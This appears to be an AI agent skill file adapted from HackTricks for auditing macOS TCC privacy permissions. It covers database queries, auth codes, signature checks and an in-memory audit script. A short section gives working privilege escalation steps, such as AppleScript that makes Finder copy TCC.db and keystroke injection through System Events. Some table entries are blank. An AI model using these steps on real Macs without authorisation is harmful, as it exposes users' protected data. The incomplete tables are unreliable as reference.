# Hacktricks-skills: macos-tcc-analyzer

Analyze macOS TCC (Transparency, Consent, and Control) permissions, query TCC databases, and assess TCC-based privilege escalation opportunities. Use this skill whenever the user mentions macOS security, TCC permissions, privacy protections, Full Disk Access, accessibility permissions, automation permissions, or any macOS application permission auditing. Trigger for security assessments, penetration testing, or understanding what permissions apps have on macOS systems.

```shell
git clone https://github.com/abelrguezr/hacktricks-skills
```

Skill file: `skills/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc/SKILL.MD`

# macOS TCC Analyzer
A skill for analyzing macOS TCC (Transparency, Consent, and Control) permissions, querying TCC databases, and identifying potential privilege escalation vectors.
## What is TCC?

TCC is macOS's security framework that regulates application permissions for sensitive features like:
- Location services
- Contacts, photos, microphone, camera
- Accessibility
- Full Disk Access (FDA)
- Automation (Apple Events)
## Quick Start

### Query User TCC Database

```shell
sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db
sqlite> select service, client, auth_value from access;
```

### Query System TCC Database

```shell
sudo sqlite3 /Library/Application\ Support/com.apple.TCC/TCC.db
sqlite> select service, client, auth_value from access;
```

### Check Specific App Permissions

```shell
# Approved permissions for an app (auth_value=2)
sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db \
  "select service, client, auth_value from access where client LIKE '%telegram%' and auth_value=2;"

# Denied permissions (auth_value=0)
sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db \
  "select service, client, auth_value from access where client LIKE '%telegram%' and auth_value=0;"
```
## TCC Database Locations

| Database | Path | Protection |
|---|---|---|
| User TCC | `~/Library/Application Support/com.apple.TCC/TCC.db` | TCC protected (read/write) |
| System TCC | `/Library/Application Support/com.apple.TCC/TCC.db` | SIP + TCC protected |
| Location Services | | SIP protected |
| REG.db | | SIP + TCC protected |
| MDMOverrides | | SIP + TCC protected |
| AllowApplicationsList | | SIP protected (readable) |
## Auth Values

| Value | Meaning |
|---|---|
| 0 | Denied |
| 1 | Unknown |
| 2 | Allowed |
| 3 | Limited |
## Auth Reasons

| Value | Meaning |
|---|---|
| 1 | Error |
| 2 | User Consent |
| 3 | User Set |
| 4 | System Set |
| 5 | Service Policy |
| 6 | MDM Policy |
| 7 | Override Policy |
| 8 | Missing usage string |
| 9 | Prompt Timeout |
| 10 | Preflight Unknown |
| 11 | Entitled |
| 12 | App Type Policy |
## Common TCC Services

| Service | Description |
|---|---|
| | Microphone access |
| | Camera access |
| | Contacts access |
| | Calendar access |
| | Photos access |
| | Reminders access |
| | Full Disk Access |
| | Desktop folder access |
| | Documents folder access |
| | Downloads folder access |
| `kTCCServiceAppleEvents` | Automation/Apple Events |
| `kTCCServicePostEvent` | Post events |
| `kTCCServiceAccessibility` | Accessibility |
| `kTCCServiceEndpointSecurityClient` | Endpoint Security Client (grants FDA) |
| | SysAdmin files |
| | Location services |
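As an added example (not part of the HackTricks skill or its bundled scripts), the following Python reads the `access` table, decodes `auth_value` and `auth_reason` with the tables above, and flags Allowed grants for services that are FDA or a route to FDA. It assumes only the column subset shown, that `client_type` 0 is a bundle id and 1 a path, and that `kTCCServiceSystemPolicyAllFiles` is the FDA service name (not on this page); the database it queries is constructed in memory so it runs without a real TCC.db.

```python
import sqlite3

AUTH_VALUE = {0: "Denied", 1: "Unknown", 2: "Allowed", 3: "Limited"}
AUTH_REASON = {1: "Error", 2: "User Consent", 3: "User Set", 4: "System Set",
               5: "Service Policy", 6: "MDM Policy", 7: "Override Policy",
               8: "Missing usage string", 9: "Prompt Timeout",
               10: "Preflight Unknown", 11: "Entitled", 12: "App Type Policy"}
# Grants that are FDA or a route to FDA; SystemPolicyAllFiles is assumed to be FDA.
HIGH_IMPACT = {"kTCCServiceSystemPolicyAllFiles", "kTCCServiceEndpointSecurityClient",
               "kTCCServiceAccessibility", "kTCCServiceAppleEvents",
               "kTCCServicePostEvent"}
QUERY = ("select service, client, client_type, auth_value, auth_reason, hex(csreq) "
         "from access")

def open_tcc_db(path):
    """Open a TCC.db read-only (reading the live user DB needs TCC rights itself)."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)

def load_grants(conn):
    """Return every access row with auth_value/auth_reason decoded to labels."""
    rows = []
    for service, client, ctype, value, reason, csreq_hex in conn.execute(QUERY):
        rows.append({"service": service, "client": client,
                     "client_type": "bundle id" if ctype == 0 else "path",
                     "auth_value": AUTH_VALUE.get(value, f"unknown({value})"),
                     "auth_reason": AUTH_REASON.get(reason, f"unknown({reason})"),
                     "csreq_hex": csreq_hex or ""})  # hex(NULL) comes back empty
    return rows

def high_impact_grants(rows):
    """(client, service) pairs that are Allowed for an FDA-reaching service."""
    return sorted((r["client"], r["service"]) for r in rows
                  if r["auth_value"] == "Allowed" and r["service"] in HIGH_IMPACT)

def build_sample_db():
    """Constructed in-memory stand-in holding only the access columns used above."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table access (service text, client text, client_type int, "
                 "auth_value int, auth_reason int, csreq blob)")
    conn.executemany("insert into access values (?,?,?,?,?,?)", [
        ("kTCCServiceAccessibility", "com.example.editor", 0, 2, 2, bytes.fromhex("FADE0C00")),
        ("kTCCServiceAppleEvents", "com.example.editor", 0, 0, 3, None),
        ("kTCCServiceMicrophone", "com.example.chat", 0, 2, 2, None),
        ("kTCCServiceSystemPolicyAllFiles", "/usr/local/bin/agent", 1, 2, 6, None),
    ])
    return conn

if __name__ == "__main__":
    print(high_impact_grants(load_grants(build_sample_db())))
```

To audit a real database, copy TCC.db to a scratch location, pass it to `open_tcc_db()` and hand the connection to `load_grants()`.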
## TCC Privilege Escalation Vectors

### 1. Automation + Finder → FDA*

If you have `kTCCServiceAppleEvents` over Finder, you can use AppleScript to make Finder copy TCC databases:

```shell
osascript <<EOD
tell application "Finder"
    set homeFolder to path to home folder as string
    set sourceFile to (homeFolder & "Library:Application Support:com.apple.TCC:TCC.db") as alias
    set targetFolder to POSIX file "/tmp" as alias
    duplicate file sourceFile to targetFolder with replacing
end tell
EOD
```

### 2. System Events + Accessibility → FDA*

With `kTCCServicePostEvent` + `kTCCServiceAccessibility`, you can send keystrokes to processes:

```applescript
tell application "System Events"
    tell application "Finder" to activate
    keystroke "g" using {command down, shift down}
    delay 1
    keystroke "/tmp"
    delay 1
    keystroke return
end tell
```

### 3. Endpoint Security Client → FDA

Having `kTCCServiceEndpointSecurityClient` grants Full Disk Access immediately.

### 4. SIP Bypass → TCC Bypass

If you can bypass SIP, you can:
- Modify the system TCC database
- Modify `AllowApplicationsList.plist` to add your app
- Remove protection from TCC databases
## TCC Signature Checks

TCC stores code signing requirements (`csreq`) to verify the requesting app:

```shell
# Get csreq from database
sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db \
  "select service, client, hex(csreq) from access where auth_value=2;"

# Decode csreq
echo "FADE0C00..." | xxd -r -p > csreq.bin
csreq -t -r csreq.bin

# Create new csreq for an app
REQ_STR=$(codesign -d -r- /Applications/YourApp.app 2>&1 | awk -F ' => ' '/designated/{print $2}')
echo "$REQ_STR" | csreq -r- -b /tmp/csreq.bin
```
## Reset TCC Permissions

```shell
# Reset all permissions for an app
tccutil reset All com.example.app

# Reset all permissions for all apps
tccutil reset All
```
## User Intent / com.apple.macl

Files can have extended attributes granting specific app access:

```shell
# Check file's macl attribute
xattr filename

# Read macl details
macl_read filename

# Get app UUID
otool -l /Applications/YourApp.app/Contents/MacOS/YourApp | grep uuid
```
## Helper Scripts

Use the bundled scripts for common tasks:
- `query-tcc-database.sh`: Query TCC databases with filters
- `check-app-permissions.sh`: Check all permissions for a specific app
- `generate-tcc-report.sh`: Generate comprehensive TCC permission report
- `extract-csreq.sh`: Extract and decode csreq from TCC database
## Security Considerations

- TCC databases are protected: the user database requires TCC privileges to read/write, the system database requires a SIP bypass
- Signature verification: apps must match the stored csreq to use granted permissions
- Entitlements matter: apps need proper entitlements to request certain permissions
- Responsible process: TCC tracks the GUI app responsible, not just the requesting process
- Finder always has FDA, but you can't execute arbitrary code through it